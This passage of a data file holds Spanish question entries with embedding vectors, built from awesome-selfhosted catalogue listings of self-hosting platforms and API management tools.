0.0078, 0.02085, -0.04169, 0.04099, -0.03669, 0.02409, -0.00528, 0.04628, 0.07401, -0.0459, -0.08979, -0.02415, -0.03765, 0.01668, 0.06196, -0.10874, -0.07057, 0.0404, -0.01446, -0.00325, -0.01327, 0.02141, -0.00469, -0.0455, 0.07909, 0.06688, -0.06565, -0.01571, -0.10511, -0.06163, -0.02756, 0.0494, -0.0133, 0.02778, -0.05625, -0.0399, -0.06658, -0.07146, -0.01729, 0.06498, 0.02581, 0.05026, -0.09651, -0.01508, 0.00639, -0.11659, 0.00756, -0.06388, 0.02402, -0.08081, 0.0186, -0.0801, -0.03651, -0.06982, 0.09931, -0.01824, -0.02037, -0.04208, 0.07332, 0.06288, -0.03861, -0.00945, 0.01593, -0.0378, 0.02006, -0.00386, -0.02844, 0.05155, -0.12538, 0.01467, -0.03578, -0.06143, -0.02811, 0.04483, -0.07139, 0.05558, 0.06133, -0.10646, -0.01829, 0.01299, -0.04473, -0.03956, -0.03856, 0.00272, 0.0256, -0.01461, -0.01764, -0.06303, -0.01137, 0.05914, -0.03644, -0.07441, -0.10017, 0.01081, 0.02249, -0.00123, -0.00872, -0.00251, 0.03103, -0.02788, -0.01997, -0.05024, -0.03031, 0.01133, 0.08599, 0.06856, 0.02999, 0.11149, -0.02586, -0.04111, 0.06937, 0.0684, -0.06834, 0.01471, 0.00053, 0.05635, 0.03514, 0.01287, -0.05944, -0.00616, 0.08286, -0.02389, 0.02488, -0.0337, 0.00997, -0.01417, 0.05982, 0.00464, 0.01677, 0.03217, -0.03889, 0.01359, -0.03112, 0.00459, -0.07186, 0.04001, 0.06768, -0.03536, -0.00937, -0.00833, -0.06768, -0.0409, -0.00554, -0.05219, -0.02055, 0.02092, -0.01327, 0.01358, 0.02095, 0.03406, -0.00827]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "que programa sirve para instalar Nextcloud y otros apps en un Raspberry Pi de forma sencilla?", "v": [-0.09053, 0.02401, -0.12768, -0.26425, 0.05303, -0.19597, -0.04072, -0.10253, -0.05925, -0.01967, -0.01895, -0.13023, 9e-05, -0.09752, 0.07433, -0.10932, -0.10562, -0.08595, 0.13999, 0.06173, -0.05478, -0.00442, -0.17969, 0.03144, -0.01145, 0.11011, 0.13683, 0.0659, -0.10294, -0.03793, 0.08062, -0.06523, 0.03321, -0.15223, -0.21074, -0.05527, 0.01879, -0.02526, -0.0268, 0.01768, 0.02137, 0.0247, 0.00679, 0.08628, -0.00973, 0.0604, 0.15499, 0.00652, 0.03639, 0.04852, -0.03551, -0.04436, -0.06556, 0.04969, -0.01632, -0.03546, 0.02098, -0.24912, 0.04, 0.00376, -0.10987, 0.06018, -0.06492, 0.02366, 0.0203, -0.03965, -0.02764, 0.10308, -0.14839, 0.04687, 0.02159, 0.00971, 0.01807, -0.04916, 0.04856, 0.09828, -0.04174, -0.0543, 0.07097, 0.01122, 0.00861, -0.02916, -0.01689, 0.00852, -0.05804, -0.07321, 0.03537, 0.00971, 0.03345, -0.01114, -0.05969, 0.11283, 0.06181, 0.07337, 0.08228, -0.03306, 0.09476, 0.05161, 0.03024, 0.06825, 0.05314, -0.02956, -0.02142, 0.00112, -0.11662, 0.01909, 0.07169, -0.02302, -0.03168, -0.00315, 0.03074, 0.02049, -0.04531, 0.0489, -0.03875, -0.05267, 0.03117, -0.02969, -0.02576, 0.00186, -0.03188, -0.04131, -0.03099, 0.0107, 0.04985, 0.06977, -0.06768, 0.07326, -0.01377, 0.06922, 0.02599, -0.07432, -0.00486, 0.10524, -0.09681, -0.10563, 0.03354, -0.05642, -0.01489, -0.02991, 0.04675, 0.06108, 0.03477, -0.06168, 0.01566, -0.03838, 0.02978, -0.03789, 0.05951, 0.04255, 0.02342, 0.01196, -0.08797, 0.03406, -0.06044, -0.01851, 0.00748, -0.00243, -0.0365, 0.02365, -0.03094, -0.05115, -0.07858, -0.02698, 0.02802, -0.05366, 0.03688, 0.00445, 0.1395, 0.09529, -0.0164, 0.07738, 0.01932, -0.10447, -0.01882, -0.00983, -0.02609, -0.04873, 0.02443, -0.06058, -0.10353, 0.04007, 0.0479, 0.05952, -0.00226, -0.03677, -0.05208, -0.00096, -0.0308, -0.01859, 0.03333, 0.04684, -0.02686, -0.03275, 0.03728, -0.02208, -0.02703, -0.05852, -0.01045, -0.0152, -0.05471, -0.01734, -0.06017, 0.03272, 0.02923, 0.03164, -0.00472, 0.0223, 0.00565, 0.05103, 0.00897, 0.04202, 0.05297, 0.05514, 0.0295, -0.04008, -0.00601, 0.08301, 0.04499, 0.02442, -0.02665, -0.00725, -0.01231, 0.0483, -0.02474, -0.01738, 0.02128, 0.04526, 0.00216, -0.00488, -0.03625, -0.02354, 0.0721, -0.01725, 0.00922, -0.04437, 0.00679, 0.04514, -0.04802, -0.05082, -0.00354, 0.06124, 0.04881, -0.03532, -0.08183, 0.00564, -0.02595, 0.04129, 0.01432, -0.02607, -0.03329, 0.0442, 0.05216, -0.01226, -0.00876, 0.0717]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "con que puedo montar una red de almacenamiento privado tipo NAS sin tener que configurar cada servicio manualmente?", "v": [0.08096, 0.11812, -0.17561, -0.16664, -0.06476, -0.05236, -0.0618, -0.0037, -0.19037, -0.05259, -0.11816, -0.1368, 0.04091, -0.11806, 0.06332, 0.05731, -0.01393, -0.09809, 0.08639, 0.11347, -0.05086, -0.12309, -0.05956, 0.06498, 0.04239, 0.11914, 0.10872, -0.13428, -0.21926, 0.04797, 0.05806, 0.06119, 0.01315, 0.00761, -0.06447, -0.00697, 0.01463, 0.00891, -0.08833, -0.03059, -0.01634, 0.0233, -0.03703, 0.19077, 0.04515, -0.01685, 0.03166, -0.04205, 0.01042, 0.00532, 0.03816, -0.02184, -0.07945, -0.06332, -0.04499, -0.0274, 0.155, -0.07569, -0.0103, 0.06331, -0.02769, 0.1055, 0.03837, 0.13629, 0.11031, -0.00206, -0.04179, -0.0444, -0.11635, 0.02148, -0.02389, -0.03056, -0.06184, 0.00151, 0.05581, 0.1027, 0.06158, 0.03486, 0.12035, 0.02685, -0.0235, 0.00208, -0.0376, 0.09401, -0.09586, -0.06003, -0.03364, -0.05499, -0.00379, -0.02981, 0.09877, -0.00143, 0.02863, 0.03425, -0.04662, -0.09317, 0.09332, 0.12163, -0.05839, -0.03931, 0.07352, 0.0758, 0.00996, 0.11815, 0.07129, 0.0899, 0.03973, -0.04883, 0.0994, -0.04626, 0.05432, 0.063, 0.0279, 0.00204, -0.06623, -0.09092, 0.00354, -0.03138, 0.00992, 0.02201, -0.07996, -0.07244, 0.06513, 0.01542, 0.01988, -0.04239, -0.0266, 0.0489, -0.03668, 0.01446, -0.01609, -0.03516, 0.00415, -0.03511, 0.01917, 0.00462, -0.09732, -0.0474, 0.00399, -0.01863, 0.04197, 0.01348, -0.05449, -0.1285, 0.08905, 0.00342, -0.01783, -0.08107, -0.01214, 0.01436, -0.00949, 0.05637, 0.03875, 0.01025, -0.05104, 0.08062, 0.05616, -0.09315, -0.01711, 0.08025, -0.02003, -0.00077, 0.00486, -0.01858, -0.01913, -0.03066, -0.00985, -0.02249, 0.06609, -0.01744, -0.08047, 0.01624, -0.07276, -0.06076, 0.06123, 0.00912, -0.01019, -0.05311, 0.0794, 0.00027, -0.03578, 0.00736, -0.03284, 0.046, -0.03963, -0.04895, -0.01851, -0.01718, 0.00264, -0.01132, 0.0008, 0.02961, -0.0224, 0.03613, 0.05292, -0.04726, -0.06125, 0.00063, -0.02132, 0.019, -0.04173, 0.02546, -0.00431, 0.00027, 0.00657, -0.00361, -0.09963, 0.09266, 0.01848, 0.03669, 0.00102, 0.01138, 0.08569, -0.08457, -0.06161, 0.05176, 0.02655, -0.02938, -0.01211, 0.00195, 0.0469, -0.02663, 0.10197, -0.02229, -0.0297, 0.00892, 0.05701, 0.04947, 0.06025, 0.04361, -0.05042, 0.05464, -0.02199, 0.00445, 0.07412, 0.00795, 0.05543, 0.00326, -0.04073, 0.00812, 0.07372, 0.06737, -0.02659, -0.00806, -0.01815, -0.04783, -0.10071, 0.06729, 0.03153, -0.06872, 0.00797, 0.03497, 0.01243, -0.04276, 0.01742, -0.0556]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "cual es una alternativa libre a Docker o Kubernetes para subir aplicaciones automΓ‘ticamente desde una interfaz web?", "v": [-0.07223, 0.02819, -0.06275, -0.06856, 0.03411, -0.11279, -0.05758, 0.02962, -0.16798, -0.05281, -0.17787, -0.24549, -0.15794, -0.007, -0.02985, -0.0873, 0.04126, -0.1544, 0.12219, 0.02224, 0.11925, 0.05494, -0.10225, -0.09975, -0.04304, -0.0156, 0.00752, -0.00858, -0.11487, -0.06097, 0.03407, -0.00425, 0.06047, -0.01474, -0.11486, -0.06457, 0.09565, 0.07977, 0.04943, -0.01955, 0.08414, 0.00681, -0.14496, 0.1198, 0.00668, 0.00724, -0.0821, -0.03716, 0.04357, -0.02777, -0.02062, -0.03753, 0.03738, -0.01295, -0.02216, -0.04803, 0.19655, -0.18647, -0.00344, -0.02983, -0.09405, 0.08433, -0.02359, -0.02864, 0.09885, -0.06337, -0.05915, 0.11913, -0.03053, 0.12522, 0.07357, 0.06873, 0.05371, 0.08181, 0.03318, 0.1427, -0.0785, -0.01104, 0.08364, 0.0448, 0.01708, -0.02731, -0.03414, 0.13376, -0.00228, -0.11111, 0.08156, -0.11733, 0.01997, 0.03729, 0.12413, 0.03206, 0.0347, 0.07881, 0.07421, -0.1712, 0.0378, 0.07167, 0.06882, 0.01532, 0.04296, -0.03721, -0.08217, 0.05326, -0.00654, 0.00721, 0.02449, -0.03404, -0.0676, 0.03198, 0.04083, -0.02904, 0.04151, -0.05757, -0.05167, -0.00755, 0.01963, -0.02497, -0.01503, -0.06711, -0.02796, -0.07575, -0.02926, -0.06217, 0.00191, 0.00051, 0.02248, 0.08209, -0.03993, 0.01729, 0.06243, -0.03003, -0.08311, -0.06748, -0.06929, -0.02537, -0.02182, -0.04565, 0.04368, -0.02874, 0.01804, 0.1061, 0.01052, -0.02489, 0.04305, 0.01141, -0.00338, -0.08735, -0.0219, 0.0175, 0.00586, 0.02743, -0.01817, 0.08838, -0.04876, -0.00061, -0.07648, -0.04356, -0.05686, 0.06116, 0.02337, -0.02037, -0.04052, 0.03792, -0.0571, -0.03296, -0.05826, -0.03985, 0.0088, 0.0419, -0.03286, 0.05026, 0.05286, -0.08147, 0.02487, -0.02285, 0.01047, -0.06296, 0.03189, -0.06359, -0.00846, -0.02289, 0.02008, -0.00634, -0.06534, -0.13326, 0.00822, -0.00621, 0.0299, 0.06222, -0.08372, 0.06243, -0.05188, -0.05933, 0.05446, -0.01463, -0.00206, -0.07043, -0.04675, 0.01237, -0.02299, -0.02589, -0.02929, -0.02659, -0.01175, 0.05766, 0.00081, 0.06439, 0.00658, 0.08183, -0.02234, 0.02238, 0.05616, 0.02666, -0.00064, -0.04045, 0.05478, -0.01693, -0.00479, -0.03636, 0.02571, -0.0013, 0.01097, 0.00662, -0.00456, 0.02634, 0.01472, 0.07683, -0.01957, 0.00409, -0.02768, -0.01203, 0.01448, 0.00426, 0.02519, 0.02815, 0.00632, -0.01111, -0.0161, -0.03898, -0.00751, 0.04604, 0.01414, -0.01291, -0.05429, -0.02806, -0.08131, 0.00358, 0.00919, -0.05894, -0.03328, 0.05948, 0.04352, 0.02221, -0.03032, -0.00576]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "ΒΏQuΓ© herramienta sirve para instalar y gestionar aplicaciones de autoalojamiento con un solo comando?", "v": [-0.11224, 0.10567, -0.10286, -0.304, 0.06047, -0.13734, -0.04315, -0.00353, -0.11338, -0.00705, -0.14885, -0.14622, 0.00735, -0.04308, 0.05812, 0.03205, 0.12856, -0.20961, -0.07505, 0.03168, -0.0254, 0.07047, -0.05339, -0.03958, -0.05772, 0.10615, 0.16177, -0.11021, -0.22261, -0.0511, -0.0137, 0.01785, 0.12134, -0.08905, -0.06688, -0.02815, -0.04186, -0.01763, -0.00625, 0.16354, -0.05744, 0.0173, -0.03822, 0.07026, 0.07554, 0.02584, 0.06296, -0.05747, -0.00241, 0.05717, -0.04026, -0.09138, 0.00247, 0.02477, -0.01237, -0.05856, 0.17756, -0.12775, 0.05031, -0.06881, -0.16779, -0.00946, -0.07838, 0.1276, 0.01632, -0.0113, 0.01134, -0.00995, -0.09792, 0.03783, -0.09103, 0.01289, 0.0179, 0.08881, 0.05092, 0.01982, -0.02081, 0.06294, 0.08163, -0.03715, 0.0394, 0.00908, -0.09224, 0.00333, -0.04285, -0.08005, 0.01197, -0.01342, 0.01232, -0.0247, -0.05837, 0.00291, -0.01168, -0.01102, 0.01783, -0.01509, 0.06602, -0.01418, 0.05909, 0.04275, 0.09829, -0.11062, -0.0378, 0.10069, -0.05559, 0.00364, 0.04231, -0.07987, -0.04784, -0.02654, 0.00774, -0.04896, 0.01971, 0.06061, -0.00808, 0.05772, 0.01579, -0.06517, -0.04285, -0.0771, -0.11856, 0.01519, 0.01629, 0.03256, 0.0421, -0.02616, -0.00954, 0.10342, 0.0291, 0.00729, 0.01691, -0.10444, -0.01575, -0.0088, -0.0826, 0.036, 0.05162, -0.03675, -0.06683, -0.08283, -0.00162, 0.11562, -0.01884, -0.03669, 0.07054, 0.00067, 0.03048, 0.0064, 0.0563, 0.04811, 0.08701, -0.05929, -0.05559, 0.03004, -0.04621, -0.02328, -0.01048, -0.0227, -0.03836, -0.02077, -0.04419, -0.05506, -0.03412, 0.00493, 0.01363, -0.04872, 0.02008, 0.02023, 0.05065, 0.06992, 0.03365, 0.07725, 0.06662, -0.01895, 0.02763, -0.09083, 0.01934, -0.04674, 0.00067, -0.01957, -0.03568, -0.00847, 0.04545, 0.0262, 0.01146, -0.03847, -0.02938, 0.00139, -0.02667, 0.01734, -0.00807, 0.06651, -0.00235, -0.07435, 0.06489, 0.0242, 0.01243, -0.02619, -0.05283, 0.02595, -0.04653, 0.01669, -0.02085, -0.02585, 0.04526, 0.03045, -0.00528, 0.09398, 0.02426, 0.03606, -0.01093, 0.07058, 0.06052, 0.02975, -0.03942, -0.06485, -0.00548, 0.08147, -0.0264, -0.00485, 0.00101, -0.03041, 0.00699, -0.03603, -0.00435, 0.01059, -0.00998, -0.01718, 0.00944, 0.01602, 0.01288, -0.03312, -0.0012, 0.01432, 0.01392, -0.02034, 0.03656, -0.00462, -0.01817, -0.00244, -0.02197, 0.04817, 0.04772, -0.04072, -0.09187, -0.04275, 0.00487, 0.00149, -0.0403, -0.06438, -0.03678, 0.00803, 0.04422, 0.01004, 0.00377, 0.0128]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "ΒΏCon quΓ© puedo montar una distribuciΓ³n Linux pensada para servidores personales o dispositivos IoT?", "v": [-0.0767, 0.08748, -0.18163, -0.16935, -0.00566, -0.16259, -0.08932, -0.03789, -0.17191, -0.0204, -0.00686, -0.08813, 0.09392, -0.07608, -0.01804, -0.04716, 0.12753, -0.11064, -0.0075, -0.12941, -0.11143, 0.07226, -0.10944, -0.04647, -0.00281, 0.12789, 0.05749, -0.02505, -0.07946, 0.07239, -0.04867, -0.04861, 0.04476, 0.05456, -0.16497, -0.04198, -0.05029, 0.1253, 0.07561, 0.01939, 0.10163, 0.01377, 0.0062, 0.04797, 0.11601, -0.06255, -0.00283, -0.10374, 0.0124, -0.08879, -0.0593, 0.01616, -0.03023, 0.02941, -0.07409, 0.00482, 0.16792, -0.08052, 0.16141, 0.03152, -0.12429, 0.03134, 0.00889, -0.03076, 0.00448, 0.02221, -0.11281, 0.03599, -0.09575, -0.06012, 0.01382, -0.0039, -0.09585, 0.0047, 0.0656, 0.14693, -0.11597, 0.03638, 0.09976, 0.05586, -0.05563, 0.01838, 0.08338, 0.03784, -0.00354, -0.09108, 0.00182, 0.02052, -0.00988, 0.04801, -0.00268, 0.04654, -0.00045, -0.03106, -0.00787, 0.02002, 0.11881, 0.05411, -0.01902, 0.04847, -0.08206, 0.06349, -0.12869, 0.13108, -0.03739, 0.03801, 0.04077, -0.06956, 0.05908, -0.11317, 0.04155, -0.02493, -0.02966, 0.00622, -0.03553, -0.04296, -0.01761, -0.03405, 0.03321, 0.12063, -0.02962, 0.04579, 0.11805, 0.03933, 0.06422, -0.00749, -0.009, 0.11517, -0.02087, -0.12213, 0.12826, -0.0772, -0.03708, 0.01533, -0.05381, 0.05541, 0.01939, -0.1286, -0.01989, -0.00591, 0.03799, 0.00899, -0.0602, -0.00179, 0.09997, -0.05692, 0.02883, -0.03378, 0.01794, -0.00997, 0.00126, 0.0413, -0.0068, -0.06898, -0.06804, -0.02551, 0.01933, -0.08077, -0.06272, 0.02443, -0.01545, -0.00342, 0.0139, 0.05157, -0.05057, 0.01434, 0.01514, 0.07621, 0.07269, 0.05562, -0.05836, 0.06787, -0.04373, 0.02911, 0.0288, -0.09337, -0.00929, 0.0075, 0.02443, 0.00803, -0.01188, -0.0017, 0.00229, -0.01722, 0.03984, 0.03545, -0.02266, 0.00298, 0.00039, 0.03202, 0.05547, 0.00362, 0.02908, 0.03206, 0.04609, -0.05095, -0.02772, -0.01512, -0.067, 0.06584, -0.03162, 0.00896, 0.01937, 0.03087, 0.02028, -0.02645, -0.07879, 0.05619, -0.00698, 0.03624, -0.00843, -0.01631, 0.098, -0.02977, -0.019, 0.00978, 0.02661, 0.00618, -0.0166, -0.01449, -0.00299, -0.0088, 0.0303, -0.0123, 0.02052, 0.06488, -0.0128, -0.02895, 0.02636, -0.02565, 0.01721, 0.01286, 0.03213, -0.00936, -0.03852, -0.01676, -0.00803, 0.03155, -0.00469, -0.01675, -0.05448, 0.1043, 0.01084, -0.04872, -0.03601, -0.08962, -0.06367, -0.00631, -0.07944, -0.06165, -0.03063, 0.00169, 0.03472, -0.01119, -0.04542, 0.00923]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "ΒΏCuΓ‘l es el mejor programa para desplegar y administrar servicios como correo, redes sociales o almacenamiento en mis propios servidores?", "v": [-0.08974, -0.00162, -0.00916, -0.28713, -0.01301, -0.06432, 0.03467, -0.13593, -0.09359, -0.13448, -0.10185, -0.06509, 0.05046, -0.13606, 0.09023, 0.0081, 0.11684, -0.01996, 0.10697, 0.05936, -0.01322, 0.08413, -0.05544, -0.05861, -0.10476, -0.01637, 0.11979, -0.11243, -0.14597, 0.08445, -2e-05, -0.06701, 0.02404, -0.09326, -0.00808, 0.0954, 0.06089, 0.14952, -0.08487, 0.06744, 0.06458, 0.00332, -0.04596, 0.03928, 0.03846, 0.00828, -0.01625, -0.06144, 0.01889, -0.03546, -0.12086, -0.08219, -0.07758, 0.02189, -0.0623, 0.00775, 0.00814, -0.15533, -0.01784, 0.00799, -0.12167, 0.05238, -0.01676, 0.07273, 0.05963, -0.05594, -0.00716, 0.00706, -0.16183, 0.03871, -0.01784, 0.06635, 0.0244, -0.05745, -0.00662, 0.15007, -0.02416, 0.04364, 0.00995, 0.02874, -0.02105, 0.02813, -0.06043, 0.08744, -0.13495, -0.07313, 0.03153, -0.06009, -0.03716, -0.01585, 0.08163, 0.00442, -0.08958, 0.08686, -0.05142, 0.04051, 0.07212, -0.04323, 0.02468, 0.02448, 0.03157, -0.00226, -0.03262, 0.06341, -0.08109, 0.09617, 0.03263, -0.08242, 0.08869, -0.04942, 0.07926, -0.02518, -0.02261, 0.02726, -0.05964, -0.00651, -0.06184, -0.03439, 0.06367, 0.00085, -0.07075, -0.00717, 0.0888, 0.01298, 0.14844, -0.00014, 0.02189, 0.07207, 0.02744, 0.06624, -0.02235, -0.00966, -0.04708, -0.03779, 0.01533, -0.10177, -0.01266, -0.06533, 0.00364, -0.10527, -0.02499, -0.00344, -0.05339, -0.06311, 0.05295, 0.02292, 0.09306, -0.10185, -0.05456, 0.01332, 0.01826, -0.00441, -0.00596, -0.02565, -0.09443, 0.04319, -0.08237, -0.13706, -0.07815, 0.05247, -0.00041, -0.0627, 0.01959, 0.01316, -0.02281, 0.01789, 0.00113, 0.07724, 0.06325, 0.03505, -0.05813, 0.04922, 0.01023, -0.08807, 0.02348, -0.0101, -0.03236, -0.03907, 0.09903, 0.03726, -0.11067, 0.02789, 0.00326, 0.07428, -0.04679, -0.08515, -0.01818, 0.06162, 0.00479, 0.02649, 0.01151, -0.0649, 0.00594, 0.06215, 0.04151, -0.09292, -0.06669, -0.01816, 0.01834, 0.00993, -0.03078, -0.02175, -0.05454, 0.02622, -0.0398, 0.03686, -0.06163, 0.01378, 0.01447, 0.09541, -0.02693, -0.02153, 0.07543, -0.03901, -0.05722, -0.02807, 0.07071, -0.01103, 0.01952, 4e-05, -0.03224, 0.02246, 0.02837, -0.01723, -0.01424, 0.00832, 0.02484, 0.04132, 0.02871, 0.01325, -0.00848, -0.00416, -0.00472, -0.01957, 0.03384, -0.04199, 0.0393, -0.07002, -0.00114, -0.06621, 0.01999, 0.06462, -0.01258, 0.00359, -0.01697, -0.03166, -0.09376, 0.05704, -0.06061, -0.03886, 0.00964, -0.02404, 0.03957, -0.00301, 0.02666, -0.00725]} +{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "quΓ© programa me sirve para convertir cualquier base de datos en una API RESTful", "v": [-0.19876, 0.07584, -0.07319, -0.20459, 0.03636, -0.08672, 0.0852, -0.17052, -0.10256, -0.03579, -0.10881, -0.21102, -0.07265, -0.11365, 0.14586, -0.01071, 0.00464, -0.07763, 0.09031, 0.06368, 0.02873, -0.07191, -0.12931, -0.03422, -0.03223, 0.06576, 0.12507, 0.00768, -0.08548, -0.01891, 0.03146, -0.08376, -0.05932, -0.05977, -0.09846, -0.02244, 0.05787, 0.04808, -0.05995, 0.00201, 0.02547, -0.0674, -0.04586, 0.1325, 0.08733, 0.04372, 0.0641, -0.0349, 0.04038, -0.06036, -0.00528, 0.00177, -0.09447, 0.00902, -0.01194, -0.0464, -0.05273, -0.18045, 0.04921, 0.06312, -0.07798, -0.03019, -0.05147, -0.04168, 